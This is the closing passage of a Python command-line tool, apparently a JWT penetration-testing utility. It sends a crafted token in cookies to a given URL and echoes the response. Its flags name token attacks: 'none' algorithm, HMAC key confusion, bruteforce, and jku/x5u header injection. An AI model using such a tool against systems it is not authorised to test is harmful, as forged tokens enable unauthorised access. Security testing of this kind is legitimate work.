                data_dict[new_str[0]] = new_str[1]

        cookies_dict = dict()
        for cookie in kwargs["cookies"]:
            new_str = cookie.split("=")
            if len(new_str) != 2:
                sys.exit(VALID_COOKIES)
            if new_str[1] == "MY_JWT":
                cookies_dict[new_str[0]] = jwt
            else:
                cookies_dict[new_str[0]] = new_str[1]
        try:
            response = send_jwt_to_url(
                kwargs["url"],
                kwargs["method"],
                data_dict,
                cookies_dict,
                jwt,
            )
            click.echo(response.text)
        except requests.exceptions.ConnectionError:
            sys.exit("Connection Error. Verify your url.")
    if kwargs["print"]:
        copy_to_clipboard(jwt)
        print_decoded(jwt)

    if (
        not kwargs["none_vulnerability"]
        and not kwargs["hmac"]
        and not kwargs["bruteforce"]
        and not kwargs["sign"]
        and not kwargs["verify"]
        and not kwargs["jku"]
        and not kwargs["x5u"]
        and not kwargs["print"]
    ):
        copy_to_clipboard(jwt)
        click.echo(NEW_JWT + jwt)
    sys.exit()


if __name__ == "__main__":
    myjwt_cli()
